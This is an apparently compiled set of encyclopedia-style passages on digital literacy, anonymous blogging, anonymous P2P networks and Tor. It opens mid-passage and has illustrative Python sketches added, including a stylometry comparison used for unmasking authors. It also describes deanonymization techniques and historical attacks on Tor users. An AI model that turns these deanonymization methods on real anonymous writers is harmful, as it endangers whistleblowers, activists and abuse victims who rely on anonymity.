was based on Senator Ed Markey's Digital Age Act, which was first introduced to the Senate in 2016. In addition, Senator Markey provided a statement after the act was passed through the Senate: "American ingenuity created the internet and American leadership should help bring its power to the developing world," said Senator Markey. "Bridging the global digital divide can help promote prosperity, strengthen democracy, expand educational opportunity and lift some of the world’s poorest and most vulnerable out of poverty. The Digital GAP Act is a passport to the 21st-century digital economy, linking the people of the developing world to the most successful communications and commerce tool in history. I look forward to working with my colleagues to get this legislation signed into law and to harness the power of the internet to help the developing world."[107] The Philippines' Education Secretary Jesli Lapus has emphasized the importance of digital literacy in Filipino education. He claims a resistance to change is the main obstacle to improving the nation's education in the globalized world.
In 2008, Lapus was inducted into Certiport's "Champions of Digital Literacy" Hall of Fame for his work emphasizing digital literacy.[108] A 2011 study by the Southern African Linguistics & Applied Language Studies program observed South African university students with regard to digital literacy.[109] While their courses did require some degree of digital literacy, very few students actually had access to a computer. Many had to pay others to type any work, as their digital literacy was almost nonexistent. Findings show that class, ignorance, and inexperience still affect the access to learning that South African university students may need.[109]
https://en.wikipedia.org/wiki/Digital_literacy
An anonymous blog is a blog without any acknowledged author or contributor. Anonymous bloggers may achieve anonymity through the simple use of a pseudonym, or through more sophisticated techniques such as layered encryption routing, manipulation of post dates, or posting only from publicly accessible computers.[1] Motivations for posting anonymously include a desire for privacy or fear of retribution by an employer (e.g., in whistleblower cases), a government (in countries that monitor or censor online communication), or another group. Fundamentally, deanonymization techniques can be divided into two categories: social correlation and technical identification. These techniques may be used together. The order of techniques employed typically escalates from the social correlation techniques, which do not require the compliance of any outside authorities (e.g., Internet providers, server providers, etc.), to more technical identification. Just as a blog can be on any subject, so can an anonymous blog; most fall into a handful of major categories. Recently, anonymous blogging has moved into a more aggressive and active style, with organized crime groups such as the Mafia using anonymous blogs against mayors and local administrators in Italy.[17] An IP address is a unique numerical label assigned to a computer connected to a computer network that uses the Internet Protocol for communication.[18] The most popular implementation of the Internet Protocol is the Internet (capitalized, to differentiate it from smaller internetworks). Internet Service Providers (ISPs) are allocated chunks of IP addresses by a Regional Internet Registry, which they then assign to customers. However, ISPs do not have enough addresses to give every customer a permanent address of their own. Instead, DHCP is used: a customer's device (typically a modem or router) is assigned an IP address from a pool of available addresses and keeps that address for a certain amount of time (e.g., two weeks). If the device is still active at the end of the lease, it can renew the lease and keep the same IP address; otherwise, the address is reclaimed and returned to the pool for redistribution. Thus, IP addresses provide regional information (through Regional Internet Registries) and, if the ISP keeps logs, specific customer information. While this does not prove that a specific person was the originator of a blog post (it could have been someone else using that customer's Internet connection, after all), it provides powerful circumstantial evidence. Character frequency analysis takes advantage of the fact that individuals have different vocabularies: if there is a large body of text that can be tied to an individual (for example, a public figure with an official blog), statistical analysis can be applied to both this body of text and an anonymous blog to see how similar they are. In this way, anonymous bloggers can tentatively be deanonymized.[19] This is known as stylometry; adversarial stylometry is the study of techniques for resisting such stylistic identification.
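A minimal sketch of the frequency-analysis idea follows: it compares character trigram distributions of two short samples with cosine similarity. Real stylometric systems use far richer feature sets (function words, syntax, punctuation habits) and large reference corpora, so this only illustrates the principle, and the two text samples are invented.

```python
# Minimal sketch of frequency-based authorship comparison: build character
# trigram frequency vectors for two text samples and compare them with
# cosine similarity. A higher score suggests (but does not prove) a
# stylistic match; real stylometry uses many more features.
from collections import Counter
import math

def trigram_counts(text):
    text = text.lower()
    return Counter(text[i:i + 3] for i in range(len(text) - 2))

def cosine_similarity(a, b):
    shared = set(a) & set(b)
    dot = sum(a[g] * b[g] for g in shared)
    norm = math.sqrt(sum(v * v for v in a.values())) * \
           math.sqrt(sum(v * v for v in b.values()))
    return dot / norm if norm else 0.0

# Invented samples: a known author's text and an anonymous post.
known = "The council's budget figures simply do not add up, and someone should say so."
anonymous = "Frankly, the budget figures do not add up, and somebody ought to say so."

print(cosine_similarity(trigram_counts(known), trigram_counts(anonymous)))
```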
https://en.wikipedia.org/wiki/Anonymous_blogging
An anonymous P2P communication system is a peer-to-peer distributed application in which the nodes or participants used to share resources are anonymous or pseudonymous.[1] Anonymity of participants is usually achieved by special routing overlay networks that hide the physical location of each node from other participants.[2] Interest in anonymous P2P systems has increased in recent years for many reasons, ranging from the desire to share files without revealing one's network identity and risking litigation,[3] to distrust of governments, concerns over mass surveillance and data retention, and lawsuits against bloggers.[4] There are many reasons to use anonymous P2P technology; most of them are generic to all forms of online anonymity. P2P users who desire anonymity usually do so because they do not wish to be identified as a publisher (sender) or reader (receiver) of information. A particularly open view on legal and illegal content is given in The Philosophy Behind Freenet. Governments are also interested in anonymous P2P technology. The United States Navy funded the original onion routing research that led to the development of the Tor network, which was later funded by the Electronic Frontier Foundation and is now developed by the non-profit organization The Tor Project, Inc. While anonymous P2P systems may support the protection of unpopular speech, they may also protect illegal activities, such as fraud, libel, the exchange of illegal pornography, the unauthorized copying of copyrighted works, or the planning of criminal activities. Critics of anonymous P2P systems hold that these disadvantages outweigh the advantages offered by such systems, and that other communication channels are already sufficient for unpopular speech. Proponents of anonymous P2P systems believe that all restrictions on free speech serve authoritarian interests, that information itself is ethically neutral, and that it is the people acting upon the information that can be good or evil. Perceptions of good and evil can also change (see moral panic); for example, if anonymous peer-to-peer networks had existed in the 1950s or 1960s, they might have been targeted for carrying information about civil rights or anarchism. Easily accessible anonymous P2P networks are seen by some as a democratization of encryption technology, giving the general populace access to secure communication channels already used by governments. Supporters of this view, such as Phil Zimmermann, argue that anti-surveillance technologies help to equalize power between governments and their people,[5] which, they hold, is the actual reason for banning them. John Pilger opines that monitoring of the populace helps to contain threats to the "consensual view of established authority"[6] or threats to the continuity of power structures and privilege. Some claim that true freedom of speech, especially on controversial subjects, is difficult or impossible unless individuals can speak anonymously. If anonymity is not possible, one could be subjected to threats or reprisals for voicing an unpopular view. This is one reason why voting is done by secret ballot in many democracies. Controversial information which a party wants to keep hidden, such as details about corruption issues, is often published or leaked anonymously. Anonymous blogging is one widespread use of anonymous networks.
While anonymous blogging is possible on the non-anonymous Internet to some degree too, a provider hosting the blog in question might be forced to disclose the blogger's IP address (as when Google revealed an anonymous blogger's identity[7]). Anonymous networks provide a better degree of anonymity. Flogs (anonymous blogs) in Freenet, Syndie and other blogging tools in I2P, and Osiris sps are some examples of anonymous blogging technologies.

One argument for anonymous blogging is the delicate nature of a work situation. Sometimes a blogger writing under their real name faces a choice between staying silent and causing harm to themselves, their colleagues or the company they work for.[8] Another reason is the risk of lawsuits. Some bloggers have faced multimillion-dollar lawsuits[9] (although they were later dropped completely[10]); anonymous blogging provides protection against such risks.

On the non-anonymous Internet, a domain name like "example.com" is a key to accessing information. The censorship of the Wikileaks website shows that domain names are extremely vulnerable to censorship.[citation needed] Some domain registrars have suspended customers' domain names even in the absence of a court order.[citation needed] For the affected customer, blocking of a domain name is a far bigger problem than a registrar refusing to provide a service; typically, the registrar keeps full control of the domain names in question. In the case of a European travel agency, more than 80 .com websites were shut down without any court process and have been held by the registrar since. The travel agency had to rebuild the sites under the .net top-level domain instead.[11]

Anonymous networks, on the other hand, do not rely on domain name registrars. For example, Freenet, I2P and Tor hidden services implement censorship-resistant URLs based on public-key cryptography: only a person having the correct private key can update the URL or take it down.
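A minimal sketch of this key-derived naming pattern, assuming the PyNaCl library for Ed25519 signatures, is shown below. The address format and helper names are illustrative, not the scheme of any particular network: the point is only that the name is derived from a public key, so peers can verify updates without trusting a registrar.

```python
import hashlib

from nacl.signing import SigningKey  # PyNaCl, assumed installed

# The publisher generates a key pair once; the private half never leaves them.
signing_key = SigningKey.generate()
verify_key = signing_key.verify_key

# The "address" is a digest of the public key, so it cannot be seized or
# squatted without the corresponding private key (illustrative format).
address = hashlib.sha256(bytes(verify_key)).hexdigest()[:32]

# Publishing an update means signing it; peers accept new content for
# `address` only if the signature verifies against the key it derives from.
content = b"post #1: hello from a censorship-resistant site"
signed_update = signing_key.sign(content)
assert verify_key.verify(signed_update) == content

print("address:", address)
```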
Anonymous P2P also has value in normal daily communication. When communication is anonymous, the decision to reveal the identities of the communicating parties is left up to the parties involved and is not available to a third party. Often there is no need or desire by the communicating parties to reveal their identities. As a matter of personal freedom, many people do not want processes in place by default which supply unnecessary data; in some cases, such data could be compiled into histories of their activities. For example, most current phone systems transmit caller ID information by default to the called party (although this can be disabled either for a single call or for all calls). If a person calls to make an inquiry about a product or the time of a movie, the party called has a record of the calling phone number, and may be able to obtain the name, address and other information about the caller. This information is not available about someone who walks into a store and makes a similar inquiry.

Online surveillance, such as recording and retaining details of web and e-mail traffic, may have effects on lawful activities.[12] People may be deterred from accessing or communicating legal information because they know of possible surveillance and believe that such communication may be seen as suspicious. According to law professor Daniel J. Solove, such effects "harm society because, among other things, they reduce the range of viewpoints being expressed and the degree of freedom with which to engage in political activity."[13]

Most countries ban or censor the publication of certain books and movies, and certain types of content. Other material is legal to possess but not to distribute; for example, copyright and software patent laws may forbid its distribution. These laws are difficult or impossible to enforce in anonymous P2P networks.

With anonymous money, it becomes possible to arrange anonymous markets where one can buy and sell just about anything anonymously. Anonymous money could be used to avoid tax collection. However, any transfer of physical goods between two parties could compromise anonymity.[14] Proponents argue that conventional cash provides a similar kind of anonymity, and that existing laws are adequate to combat crimes like tax evasion that might result from the use of anonymous cash, whether online or offline.[15]

Some of the networks commonly referred to as "anonymous P2P" are truly anonymous, in the sense that network nodes carry no identifiers. Others are actually pseudonymous: instead of being identified by their IP addresses, nodes are identified by pseudonyms such as cryptographic keys. For example, each node in the MUTE network has an overlay address that is derived from its public key. This overlay address functions as a pseudonym for the node, allowing messages to be addressed to it. In Freenet, on the other hand, messages are routed using keys that identify specific pieces of data rather than specific nodes; the nodes themselves are anonymous. The term anonymous is used to describe both kinds of network because it is difficult, if not impossible, to determine whether a node that sends a message originated the message or is simply forwarding it on behalf of another node.

Every node in an anonymous P2P network acts as a universal sender and universal receiver to maintain anonymity. If a node were only a receiver and did not send, then neighbouring nodes would know that the information it was requesting was for itself only, removing any plausible deniability that it was the recipient (and consumer) of the information. Thus, in order to remain anonymous, nodes must ferry information for others on the network.

Originally, anonymous networks were operated by small and friendly communities of developers. As interest in anonymous P2P increased and the user base grew, malicious users inevitably appeared and tried different attacks. This is similar to the Internet, where widespread use has been followed by waves of spam and distributed DoS (denial-of-service) attacks. Such attacks may require different solutions in anonymous networks. For example, blacklisting of originator network addresses does not work, because anonymous networks conceal this information. These networks are also more vulnerable to DoS attacks owing to their smaller bandwidth, as has been shown in examples on the Tor network. A conspiracy to attack an anonymous network could be considered criminal computer hacking, though the nature of the network makes this impossible to prosecute without compromising the anonymity of data in the network.

Like conventional P2P networks, anonymous P2P networks can implement either the opennet or the darknet (often called friend-to-friend) network type.
The network type describes how a node on the network selects its peer nodes. Some networks, like Freenet, support both network types simultaneously (a node can have some manually added darknet peer nodes and some automatically selected opennet peers).

In a friend-to-friend (or F2F) network, users only make direct connections with people they know. Many F2F networks support indirect anonymous or pseudonymous communication between users who do not know or trust one another. For example, a node in a friend-to-friend overlay can automatically forward a file (or a request for a file) anonymously between two "friends", without telling either of them the other's name or IP address. These "friends" can in turn forward the same file (or request) to their own "friends", and so on; a sketch of this forwarding appears at the end of this section. Users in a friend-to-friend network cannot find out who else is participating beyond their own circle of friends, so F2F networks can grow in size without compromising their users' anonymity. Some friend-to-friend networks allow the user to control what kinds of files can be exchanged with "friends" within the node, in order to stop them from exchanging files that the user disapproves of. Advantages and disadvantages of opennet compared to darknet are disputed; see the friend-to-friend article for a summary.

Private P2P networks are P2P networks that only allow mutually trusted computers to share files. This can be achieved by using a central server or hub to authenticate clients, in which case the functionality is similar to a private FTP server, but with files transferred directly between the clients. Alternatively, users can exchange passwords or keys with their friends to form a decentralized network. Friend-to-friend networks are P2P networks that allow users to make direct connections only with people they know; passwords or digital signatures can be used for authentication. Other networks exist only as designs or are still in development.

It is possible to implement anonymous P2P on a wireless mesh network; unlike fixed Internet connections, users don't need to sign up with an ISP to participate in such a network, and are only identifiable through their hardware. Protocols for wireless mesh networks are the Optimized Link State Routing Protocol (OLSR) and the follow-up protocol B.A.T.M.A.N., which is designed for decentralized auto-IP assignment. See also Netsukuku. Even if a government were to outlaw the use of wireless P2P software, it would be difficult to enforce such a ban without a considerable infringement of personal freedoms. Alternatively, the government could outlaw the purchase of the wireless hardware itself.
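The friend-to-friend forwarding described above can be sketched in a few lines. This is a deliberately naive model under stated assumptions: no encryption, no reply-path handling, and illustrative class and key names; real F2F networks layer cryptography and probabilistic routing on top of this basic idea.

```python
import random

class Node:
    """Toy friend-to-friend node: talks only to directly trusted friends."""

    def __init__(self, name: str):
        self.name = name
        self.friends: list["Node"] = []  # direct, mutually trusted links only
        self.files: dict[str, bytes] = {}

    def request(self, key: str, ttl: int = 5, came_from: "Node | None" = None):
        if key in self.files:
            return self.files[key]
        if ttl == 0:
            return None
        # Forward to friends in random order; each hop sees only its direct
        # neighbour, never the original requester.
        for friend in random.sample(self.friends, len(self.friends)):
            if friend is came_from:
                continue
            result = friend.request(key, ttl - 1, came_from=self)
            if result is not None:
                return result
        return None

# A knows only B; B knows A and C; C knows only B and holds the file.
a, b, c = Node("A"), Node("B"), Node("C")
a.friends, b.friends, c.friends = [b], [a, c], [b]
c.files["song"] = b"...file bytes..."

print(a.request("song") is not None)  # True: fetched via B; C never learns of A
```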
https://en.wikipedia.org/wiki/Anonymous_P2P
Tor[6] is a free overlay network for enabling anonymous communication. Built on free and open-source software and more than seven thousand volunteer-operated relays worldwide, the network lets users have their Internet traffic routed via a random path through it.[7][8] Using Tor makes it more difficult to trace a user's Internet activity by preventing any single point on the Internet (other than the user's device) from being able to view both where traffic originated and where it is ultimately going at the same time.[9] This conceals a user's location and usage from anyone performing network surveillance or traffic analysis from any such point, protecting the user's freedom and ability to communicate confidentially.[10]

The core principle of Tor, known as onion routing, was developed in the mid-1990s by United States Naval Research Laboratory employees, mathematician Paul Syverson and computer scientists Michael G. Reed and David Goldschlag, to protect American intelligence communications online.[11] Onion routing is implemented by means of encryption in the application layer of the communication protocol stack, nested like the layers of an onion. The alpha version of Tor, developed by Syverson and computer scientists Roger Dingledine and Nick Mathewson and then called The Onion Routing project (which was later given the acronym "Tor"), was launched on 20 September 2002.[12][13] The first public release occurred a year later.[14]

In 2004, the Naval Research Laboratory released the code for Tor under a free license, and the Electronic Frontier Foundation (EFF) began funding Dingledine and Mathewson to continue its development.[12] In 2006, Dingledine, Mathewson, and five others founded The Tor Project, a Massachusetts-based 501(c)(3) research-education nonprofit organization responsible for maintaining Tor. The EFF acted as The Tor Project's fiscal sponsor in its early years, and early financial supporters included the U.S. Bureau of Democracy, Human Rights, and Labor and International Broadcasting Bureau, Internews, Human Rights Watch, the University of Cambridge, Google, and Netherlands-based Stichting NLnet.[15][16]

Over the course of its existence, various Tor vulnerabilities have been discovered and occasionally exploited. Attacks against Tor are an active area of academic research[17][18] that is welcomed by The Tor Project itself.[19]

Tor enables its users to surf the Internet, chat and send instant messages anonymously, and is used by a wide variety of people for both licit and illicit purposes.[22] Tor has, for example, been used by criminal enterprises, hacktivism groups, and law enforcement agencies at cross purposes, sometimes simultaneously;[23][24] likewise, agencies within the U.S. government variously fund Tor (the U.S. State Department, the National Science Foundation, and, through the Broadcasting Board of Governors, which itself partially funded Tor until October 2012, Radio Free Asia) and seek to subvert it.[25][11] Tor was one of a dozen circumvention tools evaluated by a Freedom House-funded report based on user experience from China in 2010, which included Ultrasurf, Hotspot Shield, and Freegate.[26]

Tor is not meant to completely solve the issue of anonymity on the web; it is not designed to erase tracking entirely but to reduce the likelihood that sites can trace actions and data back to the user.[27]
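The layered encryption at the heart of onion routing, described above, can be illustrated with a short sketch. This uses symmetric Fernet encryption from the widely available `cryptography` package purely for illustration; Tor's real circuit construction uses telescoping key exchanges and fixed-size cells, so treat this as the layering idea only, not Tor's protocol.

```python
from cryptography.fernet import Fernet

# One symmetric key per relay: entry, middle, exit. (In Tor these would be
# session keys negotiated hop-by-hop, not preshared like this.)
relay_keys = [Fernet.generate_key() for _ in range(3)]

def wrap(message: bytes, keys: list[bytes]) -> bytes:
    # Encrypt for the exit relay first and the entry relay last, so the
    # entry relay's layer is outermost.
    for key in reversed(keys):
        message = Fernet(key).encrypt(message)
    return message

def peel(message: bytes, key: bytes) -> bytes:
    # Each relay removes exactly one layer, learning only the next hop's blob.
    return Fernet(key).decrypt(message)

cell = wrap(b"GET / HTTP/1.1", relay_keys)
for key in relay_keys:  # entry, then middle, then exit
    cell = peel(cell, key)
print(cell)  # b'GET / HTTP/1.1' -- cleartext exists only past the exit relay
```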
Tor is used for both legal and illegal activities. These can include privacy protection or censorship circumvention,[28] as well as the distribution of child abuse content, drug sales, or malware distribution.[29] Tor has been described by The Economist, in relation to Bitcoin and Silk Road, as being "a dark corner of the web".[30] It has been targeted by the American National Security Agency and the British GCHQ signals intelligence agencies, albeit with marginal success,[25] and more successfully by the British National Crime Agency in its Operation Notarise.[31] At the same time, GCHQ has been using a tool named "Shadowcat" for "end-to-end encrypted access to VPS over SSH using the Tor network".[32][33] Tor can be used for anonymous defamation, unauthorized news leaks of sensitive information, copyright infringement, distribution of illegal sexual content,[34][35][36] selling controlled substances,[37] weapons, and stolen credit card numbers,[38] money laundering,[39] bank fraud,[40] credit card fraud, identity theft and the exchange of counterfeit currency;[41] the black market utilizes the Tor infrastructure, at least in part, in conjunction with Bitcoin.[23] It has also been used to brick IoT devices.[42]

In its complaint against Ross William Ulbricht of Silk Road, the US Federal Bureau of Investigation acknowledged that Tor has "known legitimate uses".[43][44] According to CNET, Tor's anonymity function is "endorsed by the Electronic Frontier Foundation (EFF) and other civil liberties groups as a method for whistleblowers and human rights workers to communicate with journalists".[45] The EFF's Surveillance Self-Defense guide includes a description of where Tor fits in a larger strategy for protecting privacy and anonymity.[46]

In 2014, the EFF's Eva Galperin told Businessweek that "Tor's biggest problem is press. No one hears about that time someone wasn't stalked by their abuser. They hear how somebody got away with downloading child porn."[47]

The Tor Project states that Tor users include "normal people" who wish to keep their Internet activities private from websites and advertisers, people concerned about cyber-spying, and users who are evading censorship such as activists, journalists, and military professionals. In November 2013, Tor had about four million users.[48] According to the Wall Street Journal, in 2012 about 14% of Tor's traffic connected from the United States, with people in "Internet-censoring countries" as its second-largest user base.[49] Tor is increasingly used by victims of domestic violence and the social workers and agencies that assist them, even though shelter workers may or may not have had professional training on cyber-security matters.[50] Properly deployed, however, it precludes digital stalking, which has increased due to the prevalence of digital media in contemporary online life.[51] Along with SecureDrop, Tor is used by news organizations such as The Guardian, The New Yorker, ProPublica and The Intercept to protect the privacy of whistleblowers.[52]

In March 2015, the Parliamentary Office of Science and Technology released a briefing which stated that "There is widespread agreement that banning online anonymity systems altogether is not seen as an acceptable policy option in the U.K." and that "Even if it were, there would be technical challenges."
The report further noted that Tor "plays only a minor role in the online viewing and distribution of indecent images of children" (due in part to its inherent latency); its usage by the Internet Watch Foundation, the utility of its onion services for whistleblowers, and its circumvention of the Great Firewall of China were touted.[53]

Tor's executive director, Andrew Lewman, also said in August 2014 that agents of the NSA and the GCHQ have anonymously provided Tor with bug reports.[54]

The Tor Project's FAQ offers supporting reasons for the EFF's endorsement: Criminals can already do bad things. Since they're willing to break laws, they already have lots of options available that provide better privacy than Tor provides... Tor aims to provide protection for ordinary people who want to follow the law. Only criminals have privacy right now, and we need to fix that... So yes, criminals could in theory use Tor, but they already have better options, and it seems unlikely that taking Tor away from the world will stop them from doing their bad things. At the same time, Tor and other privacy measures can fight identity theft, physical crimes like stalking, and so on.

Tor aims to conceal its users' identities and their online activity from surveillance and traffic analysis by separating identification and routing. It is an implementation of onion routing, which encrypts and then randomly bounces communications through a network of relays run by volunteers around the globe. These onion routers employ encryption in a multi-layered manner (hence the onion metaphor) to ensure perfect forward secrecy between relays, thereby providing users with anonymity of network location. That anonymity extends to the hosting of censorship-resistant content by Tor's anonymous onion service feature.[7] Furthermore, by keeping some of the entry relays (bridge relays) secret, users can evade Internet censorship that relies upon blocking public Tor relays.[56]

Because the IP addresses of the sender and the recipient are not both in cleartext at any hop along the way, anyone eavesdropping at a single point along the communication channel cannot directly identify both ends. Furthermore, to the recipient, it appears that the last Tor node (called the exit node), rather than the sender, is the originator of the communication.

A Tor user's SOCKS-aware applications can be configured to direct their network traffic through a Tor instance's SOCKS interface, which listens on TCP port 9050 (for standalone Tor) or 9150 (for the Tor Browser bundle) at localhost.[57] Tor periodically creates virtual circuits through the Tor network through which it can multiplex and onion-route that traffic to its destination. Once inside the Tor network, the traffic is sent from router to router along the circuit, ultimately reaching an exit node, at which point the cleartext packet is available and is forwarded on to its original destination. Viewed from the destination, the traffic appears to originate at the Tor exit node.
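For example, a Python script can route its HTTP requests through a local Tor instance's SOCKS port. This assumes a Tor daemon is running on port 9050 and that the `requests` library is installed with SOCKS support (`pip install requests[socks]`); the check URL and its response wording may change over time.

```python
import requests

# "socks5h" (rather than "socks5") makes DNS resolution happen through the
# proxy as well, so hostname lookups do not leak to the local resolver.
proxies = {
    "http": "socks5h://127.0.0.1:9050",
    "https": "socks5h://127.0.0.1:9050",
}

resp = requests.get("https://check.torproject.org/", proxies=proxies, timeout=30)
print("via Tor" if "Congratulations" in resp.text else "NOT via Tor")
```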
Tor's application independence sets it apart from most other anonymity networks: it works at the Transmission Control Protocol (TCP) stream level. Applications whose traffic is commonly anonymized using Tor include Internet Relay Chat (IRC), instant messaging, and World Wide Web browsing. Tor can also provide anonymity to websites and other servers. Servers configured to receive inbound connections only through Tor are called onion services (formerly, hidden services).[58] Rather than revealing a server's IP address (and thus its network location), an onion service is accessed through its onion address, usually via the Tor Browser or some other software designed to use Tor. The Tor network understands these addresses by looking up their corresponding public keys and introduction points from a distributed hash table within the network. It can route data to and from onion services, even those hosted behind firewalls or network address translators (NAT), while preserving the anonymity of both parties. Tor is necessary to access these onion services.[59] Because the connection never leaves the Tor network and is handled by the Tor application on both ends, the connection is always end-to-end encrypted.

Onion services were first specified in 2003[60] and have been deployed on the Tor network since 2004.[61] They are unlisted by design, and can only be discovered on the network if the onion address is already known,[62] though a number of sites and services do catalog publicly known onion addresses. Popular sources of .onion links include Pastebin, Twitter, Reddit, other Internet forums, and tailored search engines.[63]

While onion services are often discussed in terms of websites, they can be used for any TCP service, and are commonly used for increased security or easier routing to non-web services, such as secure shell remote login, chat services such as IRC and XMPP, or file sharing.[58] They have also become a popular means of establishing peer-to-peer connections in messaging[64][65] and file sharing applications.[66] Web-based onion services can be accessed from a standard web browser without a client-side connection to the Tor network using services like Tor2web, which remove client anonymity.[67]
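An onion address is derived from the service's public key rather than assigned by a registrar. The sketch below re-implements the published version-3 address format (a base32 encoding of the Ed25519 public key, a two-byte SHA3-256 checksum, and a version byte) for illustration; treat it as an unofficial reconstruction, with a random byte string standing in for a real service key.

```python
import base64
import hashlib
import os

def onion_v3_address(pubkey: bytes) -> str:
    """Derive a v3 .onion address from a 32-byte Ed25519 public key."""
    assert len(pubkey) == 32
    version = b"\x03"
    # The checksum binds the key and version into the printable address.
    checksum = hashlib.sha3_256(b".onion checksum" + pubkey + version).digest()[:2]
    return base64.b32encode(pubkey + checksum + version).decode().lower() + ".onion"

fake_service_key = os.urandom(32)  # stand-in for a real Ed25519 public key
print(onion_v3_address(fake_service_key))  # 56 base32 chars + ".onion"
```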
Like all software with an attack surface, Tor's protections have limitations, and Tor's implementation or design has been vulnerable to attacks at various points throughout its history.[68][19] While most of these limitations and attacks are minor, either being fixed without incident or proving inconsequential, others are more notable. Tor is designed to provide relatively high-performance network anonymity against an attacker with a single vantage point on the connection (e.g., control over one of the three relays, the destination server, or the user's internet service provider). Like all current low-latency anonymity networks, Tor cannot and does not attempt to protect against an attacker performing simultaneous monitoring of traffic at the boundaries of the Tor network, i.e., the traffic entering and exiting the network. While Tor does provide protection against traffic analysis, it cannot prevent traffic confirmation via end-to-end correlation.[69][70]

There are no documented cases of this limitation being used at scale; as of the 2013 Snowden leaks, agencies such as the NSA were unable to perform dragnet surveillance on Tor itself, and relied on attacking other software used in conjunction with Tor, such as vulnerabilities in web browsers.[71] However, targeted attacks have been able to make use of traffic confirmation on individual Tor users, via police surveillance or investigations confirming that a particular person already under suspicion was sending Tor traffic at the exact times the connections in question occurred.[72][73] The relay early traffic confirmation attack also relied on traffic confirmation as part of its mechanism, though on requests for onion service descriptors rather than traffic to the destination server.

Like many decentralized systems, Tor relies on a consensus mechanism to periodically update its current operating parameters. For Tor, these include network parameters such as which nodes are good and bad relays, exits, and guards, and how much traffic each can handle. Tor's architecture for deciding the consensus relies on a small number of directory authority nodes voting on current network parameters. Currently, there are nine directory authority nodes, and their health is publicly monitored.[74] The IP addresses of the authority nodes are hard-coded into each Tor client. The authority nodes vote every hour to update the consensus, and clients download the most recent consensus on startup.[75][76][77] A compromise of the majority of the directory authorities could alter the consensus in a way that is beneficial to an attacker. Alternatively, a network congestion attack, such as a DDoS, could theoretically prevent the consensus nodes from communicating and thus prevent voting to update the consensus (though such an attack would be visible).[citation needed]

Tor makes no attempt to conceal the IP addresses of exit relays, or to hide from a destination server the fact that a user is connecting via Tor.[78] Operators of Internet sites therefore have the ability to block traffic from Tor exit nodes or to offer reduced functionality for Tor users. For example, Wikipedia generally forbids all editing when using Tor or when using an IP address also used by a Tor exit node,[79] and the BBC blocks the IP addresses of all known Tor exit nodes from its iPlayer service.[80]

Apart from intentional restrictions of Tor traffic, Tor use can trigger defense mechanisms on websites intended to block traffic from IP addresses observed to generate malicious or abnormal traffic.[81][82] Because traffic from all Tor users is shared by a comparatively small number of exit relays, tools can misidentify distinct sessions as originating from the same user, and attribute the actions of a malicious user to a non-malicious user, or observe an unusually large volume of traffic for one IP address. Conversely, a site may observe a single session connecting from different exit relays, with different Internet geolocations, and assume the connection is malicious, or trigger geo-blocking. When these defense mechanisms are triggered, the site may block access or present captchas to the user.
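Because exit relay addresses are public, operators who want to treat Tor traffic specially often consume the Tor Project's published exit list. A minimal sketch, assuming the bulk exit list remains available at the URL below (it may move or change format):

```python
import urllib.request

# Published list of IP addresses currently acting as Tor exit relays.
EXIT_LIST_URL = "https://check.torproject.org/torbulkexitlist"

with urllib.request.urlopen(EXIT_LIST_URL, timeout=30) as resp:
    exit_ips = {line.strip() for line in resp.read().decode().splitlines() if line.strip()}

def is_tor_exit(ip: str) -> bool:
    # In production this set would be refreshed periodically, not fetched once.
    return ip in exit_ips

print(is_tor_exit("203.0.113.7"))  # documentation-range address: expect False
```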
In July 2014, the Tor Project issued a security advisory for a "relay early traffic confirmation" attack, disclosing the discovery of a group of relays attempting to de-anonymize onion service users and operators.[83] A set of onion service directory nodes (i.e., the Tor relays responsible for providing information about onion services) were found to be modifying the traffic of requests. The modifications made it so that the requesting client's guard relay, if controlled by the same adversary as the onion service directory node, could easily confirm that the traffic was from the same request. This would allow the adversary to simultaneously learn the onion service involved in the request and the IP address of the client requesting it (where the requesting client could be a visitor or the owner of the onion service).[83] The attacking nodes had joined the network on 30 January, using a Sybil attack to make up 6.4% of guard relay capacity, and were removed on 4 July.[83] In addition to removing the attacking relays, the Tor application was patched to prevent the specific traffic modifications that made the attack possible.

In November 2014, there was speculation in the aftermath of Operation Onymous, which resulted in 17 arrests internationally, that a Tor weakness had been exploited. A representative of Europol was secretive about the method used, saying: "This is something we want to keep for ourselves. The way we do this, we can't share with the whole world, because we want to do it again and again and again."[84] A BBC source cited a "technical breakthrough"[85] that allowed the tracking of servers' physical locations, and the initial number of infiltrated sites led to the exploit speculation. A Tor Project representative downplayed this possibility, suggesting that execution of more traditional police work was more likely.[86][87]

In November 2015, court documents suggested a connection between the attack and the arrests, and raised concerns about security research ethics.[88][89] The documents revealed that the FBI had obtained the IP addresses of onion services and their visitors from a "university-based research institute", leading to the arrests. Reporting from Motherboard found that the timing and nature of the relay early traffic confirmation attack matched the description in the court documents. Multiple experts, including a senior researcher with the ICSI of UC Berkeley, Edward Felten of Princeton University, and the Tor Project, agreed that the CERT Coordination Center of Carnegie Mellon University was the institute in question.[88][90][89] Concerns raised included the role of an academic institution in policing, sensitive research involving non-consenting users, the non-targeted nature of the attack, and the lack of disclosure about the incident.[88][90][89]

Many attacks targeted at Tor users result from flaws in applications used with Tor, either in the application itself or in how it operates in combination with Tor. For example, researchers with Inria in 2011 performed an attack on BitTorrent users by attacking clients that established connections both using and not using Tor, then associating other connections shared by the same Tor circuit.[91]

When using Tor, applications may still provide data tied to a device, such as information about screen resolution, installed fonts, language configuration, or supported graphics functionality, reducing the set of users a connection could possibly originate from, or uniquely identifying them.[92] This information is known as the device fingerprint, or browser fingerprint in the case of web browsers. Applications implemented with Tor in mind, such as Tor Browser, can be designed to minimize the amount of information leaked by the application and reduce its fingerprint.[92][93]
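The idea behind fingerprinting is that a handful of individually innocuous attributes, combined, can single out a device. A toy sketch (with made-up attribute values) follows; real browser fingerprinting draws on many more signals, such as canvas rendering and font enumeration, which Tor Browser deliberately tries to make uniform across users.

```python
import hashlib
import json

# Hypothetical observable attributes reported by a client application.
attributes = {
    "screen": "1920x1080",
    "fonts": ["Arial", "DejaVu Sans", "Noto Sans"],
    "language": "en-US",
    "webgl_vendor": "Mesa",
}

# Canonicalize and hash: identical configurations collide, unusual ones stand out.
canonical = json.dumps(attributes, sort_keys=True).encode()
fingerprint = hashlib.sha256(canonical).hexdigest()

print("fingerprint:", fingerprint[:16], "...")
```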
Tor cannot encrypt the traffic between an exit relay and the destination server. If an application does not add an additional layer of end-to-end encryption between the client and the server, such as Transport Layer Security (TLS, used in HTTPS) or the Secure Shell (SSH) protocol, the exit relay can capture and modify traffic.[94][95] Attacks from malicious exit relays have recorded usernames and passwords,[96] and modified Bitcoin addresses to redirect transactions.[97] Some of these attacks involved actively removing the HTTPS protections that would otherwise have been used.[94] To attempt to prevent this, Tor Browser has since allowed only connections via onion services or HTTPS by default.[98]

